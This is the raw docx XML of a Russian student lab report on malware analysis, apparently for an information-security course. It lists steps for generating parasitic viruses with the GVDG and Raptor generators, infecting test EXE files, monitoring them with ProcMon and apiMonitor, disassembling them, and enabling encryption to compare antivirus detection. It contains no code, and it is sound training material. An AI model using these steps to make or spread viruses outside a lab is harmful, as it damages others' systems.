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8CF8" w14:textId="77777777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011584C3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9C742E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D84BAEF" w14:textId="77777777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68087F23" w:rsidR="00830F2D" w:rsidRPr="00D27F00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4E49C8">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Л</w:t>
      </w:r>
      <w:r w:rsidR="00D37F14">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>А</w:t>
      </w:r>
      <w:r w:rsidRPr="004E49C8">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>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1A5A72" w:rsidRPr="004E49C8">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36472FDB" w14:textId="56DD4170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124424E" w14:textId="4C87BB2F" w:rsidR="001A5A72" w:rsidRPr="001A5A72" w:rsidRDefault="00D37F14" w:rsidP="001A5A72">
      <w:pPr>
        <w:pStyle w:val="af8"/>
      </w:pPr>
      <w:r>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="001A5A72" w:rsidRPr="00D37F14">
        <w:rPr>
          <w:caps w:val="0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Анализ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:caps w:val="0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidR="001A5A72" w:rsidRPr="00D37F14">
        <w:rPr>
          <w:caps w:val="0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>редоносных программных средств</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4A399C" w14:textId="77777777" w:rsidR="00830F2D" w:rsidRPr="006A0481" w:rsidRDefault="00830F2D" w:rsidP="00E033D2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04F2618D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27F00">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Основы информационной безопасности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8770C9E" w:rsidR="00C53ADA" w:rsidRPr="00B57B60" w:rsidRDefault="00C53ADA" w:rsidP="00E033D2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D27F00">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2219CAA1" w14:textId="07CB7CF1" w:rsidR="00C53ADA" w:rsidRPr="00B57B60" w:rsidRDefault="00961BBB" w:rsidP="00E033D2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D27F00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D27F00">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D27F00">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>5131001</w:t>
      </w:r>
      <w:r w:rsidR="00D27F00" w:rsidRPr="00D27F00">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/4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еденеев А. С.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A04EE08" w14:textId="44839A83" w:rsidR="00D27F00" w:rsidRDefault="00C53ADA" w:rsidP="00E033D2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  <w:r w:rsidR="00D27F00">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D27F00">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D27F00" w:rsidRPr="00B57B60">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D27F00" w:rsidRPr="00B57B60">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D27F00">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">       Поляков Д. Т.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A8C67C" w14:textId="07D09130" w:rsidR="00D27F00" w:rsidRPr="00B57B60" w:rsidRDefault="00037B6A" w:rsidP="00E033D2">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="1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firstLine="3960"/>
        <w:jc w:val="left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 </w:t>
      </w:r>
      <w:r w:rsidR="00D27F00" w:rsidRPr="00B57B60">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00D27F00" w:rsidRPr="00B57B60">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>подпись</w:t>
      </w:r>
      <w:r w:rsidR="00D27F00" w:rsidRPr="00B57B60">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527F5402" w14:textId="69D378E8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9C6C28A" w14:textId="77777777" w:rsidR="000F71FD" w:rsidRDefault="000F71FD" w:rsidP="00E033D2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E033D2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09281628" w:rsidR="00C53ADA" w:rsidRPr="00B57B60" w:rsidRDefault="009C742E" w:rsidP="00E033D2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агисаров В. Б.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3CD90E" w14:textId="675E82DA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037B6A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">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E033D2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E033D2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054DF98" w14:textId="77777777" w:rsidR="00830F2D" w:rsidRDefault="00830F2D" w:rsidP="00D27F0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31287BC" w14:textId="77777777" w:rsidR="00C53ADA" w:rsidRPr="006A0481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0CF235E" w14:textId="03E3BDF2" w:rsidR="00C93DCC" w:rsidRPr="00D27F00" w:rsidRDefault="00C53ADA" w:rsidP="00E033D2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27F00">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158CA26B" w14:textId="32973B62" w:rsidR="00601F8B" w:rsidRPr="00C93DCC" w:rsidRDefault="00C93DCC" w:rsidP="00D27F00">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Цель </w:t>
      </w:r>
      <w:r w:rsidR="00037B6A">
        <w:t>и задачи</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BA0A2C" w14:textId="304904A3" w:rsidR="00C93DCC" w:rsidRPr="005467ED" w:rsidRDefault="00037B6A" w:rsidP="00037B6A">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:ind w:left="708" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037B6A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Цель:</w:t>
      </w:r>
      <w:r w:rsidRPr="00037B6A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A7473A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidR="00A7473A" w:rsidRPr="00A7473A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>риобретение практических навыков по противодействию вредоносным программным средствам на примере компьютерных вирусов</w:t>
      </w:r>
      <w:r w:rsidR="00621BCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF45112" w14:textId="4257B073" w:rsidR="00037B6A" w:rsidRDefault="00037B6A" w:rsidP="00037B6A">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:ind w:left="708" w:firstLine="708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>Задачи</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391908B0" w14:textId="6B8389C4" w:rsidR="00621BCC" w:rsidRDefault="00621BCC" w:rsidP="00621BCC">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Подготовка к работе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A894516" w14:textId="7D095EB7" w:rsidR="00A7473A" w:rsidRPr="00621BCC" w:rsidRDefault="00A7473A" w:rsidP="00621BCC">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Выбрать локальный диск и создать в нем каталоги </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7473A">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7473A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7473A">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>disk</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7473A">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidR="00621BCC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796F5AC3" w14:textId="227EFF00" w:rsidR="00621BCC" w:rsidRDefault="00621BCC" w:rsidP="00621BCC">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Смонтировать каталог </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:r w:rsidRPr="00621BCC">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>disk</w:t>
      </w:r>
      <w:r w:rsidRPr="00621BCC">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="00621BCC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>в корневой уровень системы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24117155" w14:textId="5F5A33B8" w:rsidR="00621BCC" w:rsidRDefault="00621BCC" w:rsidP="00621BCC">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Исследование механизма заражения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2557A9B1" w14:textId="4CF7F40B" w:rsidR="00621BCC" w:rsidRDefault="00621BCC" w:rsidP="00621BCC">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Запустить генератор </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GVDG</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3441E3D0" w14:textId="36EA136C" w:rsidR="00621BCC" w:rsidRDefault="00621BCC" w:rsidP="00621BCC">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Создать вирус-паразит с несколькими деструктивными функциями.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2298E761" w14:textId="50ED33D3" w:rsidR="00621BCC" w:rsidRDefault="00621BCC" w:rsidP="00621BCC">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Изучить полученный код на языке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pascal</w:t>
      </w:r>
      <w:r w:rsidRPr="00621BCC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>и построить блок-схему алгоритма работы вируса.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698E59BB" w14:textId="0A50983E" w:rsidR="00621BCC" w:rsidRDefault="00621BCC" w:rsidP="00621BCC">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Скопировать полученный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EXE</w:t>
      </w:r>
      <w:r w:rsidRPr="00621BCC">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">файл вируса в каталог </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:r w:rsidRPr="00621BCC">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="00621BCC">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">скопировать туда же несколько произвольных </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EXE</w:t>
      </w:r>
      <w:r w:rsidRPr="00621BCC">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>файлов для демонстрации заражения, предварительно сохранив эталонные копии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124B306D" w14:textId="5DF4904C" w:rsidR="00621BCC" w:rsidRDefault="00621BCC" w:rsidP="00621BCC">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Запустить скопированный компьютерный вирус.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8F5A19" w14:textId="7E51CF37" w:rsidR="00621BCC" w:rsidRDefault="00621BCC" w:rsidP="00621BCC">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Сформулировать гипотезу о способе внедрения вируса в тело файла.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACC52D9" w14:textId="375BC0A7" w:rsidR="00621BCC" w:rsidRDefault="00621BCC" w:rsidP="00621BCC">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Скопировать один из ранее сохраненных эталонных </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EXE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-файлов в каталог </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:r w:rsidRPr="00621BCC">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="00621BCC">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">запустить на исполнение один из уже зараженных </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EXE</w:t>
      </w:r>
      <w:r w:rsidRPr="00621BCC">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">файлов. Убедиться в заражении нового </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EXE</w:t>
      </w:r>
      <w:r w:rsidRPr="00621BCC">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">файла в результате запуска зараженного </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EXE</w:t>
      </w:r>
      <w:r w:rsidRPr="00621BCC">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>файла.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FA9CE9" w14:textId="14C2B712" w:rsidR="00746292" w:rsidRDefault="00746292" w:rsidP="00746292">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">С помощью встроенного в генератор </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GVDG</w:t>
      </w:r>
      <w:r w:rsidRPr="00746292">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">попытаться вылечить исполняемые файлы в каталоге </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:r w:rsidRPr="00746292">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="00746292">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF5E969" w14:textId="7E7A866A" w:rsidR="00746292" w:rsidRDefault="00746292" w:rsidP="00746292">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Повторить пп. 1.2.5 и 1.2.6, после чего запустить проверку любым сторонним антивирусом. При обнаружении вирусов включить опцию </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>шифрования в настройках генератора и повторить процедуру снова. Сравнить полученные результаты.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73483420" w14:textId="3D83956E" w:rsidR="00746292" w:rsidRPr="00746292" w:rsidRDefault="00746292" w:rsidP="00746292">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Работа с генератором вирусов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Raptor</w:t>
      </w:r>
      <w:r w:rsidRPr="00746292">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Virus</w:t>
      </w:r>
      <w:r w:rsidRPr="00746292">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Generator</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159796D7" w14:textId="62638D62" w:rsidR="00746292" w:rsidRDefault="00746292" w:rsidP="00746292">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Скопировать в каталог </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:r w:rsidRPr="00746292">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>disk</w:t>
      </w:r>
      <w:r w:rsidRPr="00746292">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="00746292">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">несколько произвольных </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EXE</w:t>
      </w:r>
      <w:r w:rsidRPr="00746292">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>файлов для демонстрации заражения, предварительно сохранив их эталонные копии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2033CE35" w14:textId="701A357D" w:rsidR="00746292" w:rsidRDefault="00746292" w:rsidP="00746292">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">С помощью программы-генератора </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Raptor</w:t>
      </w:r>
      <w:r w:rsidRPr="00746292">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Virus</w:t>
      </w:r>
      <w:r w:rsidRPr="00746292">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Generator</w:t>
      </w:r>
      <w:r w:rsidRPr="00746292">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>сгенерировать вирус, обладающий тремя деструктивными функциями и выполняющим заражение всех файлов на диске.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3882EC6E" w14:textId="5D7E7D0A" w:rsidR="00746292" w:rsidRPr="004E49C8" w:rsidRDefault="00746292" w:rsidP="00746292">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Запустить утилиту </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ProcMon</w:t>
      </w:r>
      <w:r>
        <w:t>, задать в ней фильтр по имени процесса вируса</w:t>
      </w:r>
      <w:r w:rsidR="00AD7A20">
        <w:t xml:space="preserve">. Оставив активной программу </w:t>
      </w:r>
      <w:r w:rsidR="00AD7A20">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ProcMon</w:t>
      </w:r>
      <w:r w:rsidR="00AD7A20" w:rsidRPr="00AD7A20">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00AD7A20">
        <w:t xml:space="preserve">запустить исполняемый файл вируса. Зафиксировать протокол работы вируса, полученный программой </w:t>
      </w:r>
      <w:r w:rsidR="00AD7A20">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ProcMon</w:t>
      </w:r>
      <w:r w:rsidR="00AD7A20" w:rsidRPr="004E49C8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5626857B" w14:textId="0225391C" w:rsidR="00AD7A20" w:rsidRDefault="00AD7A20" w:rsidP="00AD7A20">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Очистить папку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD7A20">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>disk</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD7A20">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD7A20">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>и повторить п. 1.3.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EF0D85" w14:textId="77777777" w:rsidR="00AD7A20" w:rsidRPr="00AD7A20" w:rsidRDefault="00AD7A20" w:rsidP="00AD7A20">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Запустить утилиту </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>apiMonitor</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD7A20">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> задать фильтр по имени процесса вируса. Инициировать слежение с помощью утилиты </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>apiMonitor</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD7A20">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и запустить созданный файл вируса в папке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD7A20">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>disk</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD7A20">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD7A20">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Зафиксировать протокол работы вируса, полученный программой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>apiMonitor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765316B5" w14:textId="77777777" w:rsidR="00AD7A20" w:rsidRDefault="00AD7A20" w:rsidP="00AD7A20">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>На основании полученных протоколов работы вируса построить функциональную схему сгенерированного вируса, выделив деструктивные функции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEF7D89" w14:textId="77777777" w:rsidR="00AD7A20" w:rsidRDefault="00AD7A20" w:rsidP="00AD7A20">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Очистить папку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virus</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD7A20">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>disk</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD7A20">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD7A20">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>и повторить п. 1.3.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690C9E2B" w14:textId="1143C17E" w:rsidR="00AD7A20" w:rsidRPr="00AD7A20" w:rsidRDefault="00AD7A20" w:rsidP="00AD7A20">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Выполнить заражение исполняемых файлов с помощью созданного вируса. Запустить программу-дизассемблер. Дизассемблировать код зараженного </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EXE</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD7A20">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>файла. Используя полученный ассемблерный код и построенную функциональную схему вируса, выделить участки программы, которые содержат тело вируса, проверяют сигнатуру вируса, осуществляют заражение и деструктивные функции, передают управление программе-носителю.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD7A20">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F948185" w14:textId="5875CD30" w:rsidR="00AC78CC" w:rsidRDefault="000D6CC6" w:rsidP="00B929E1">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>ход работы</w:t>
      </w:r>
    </w:p>
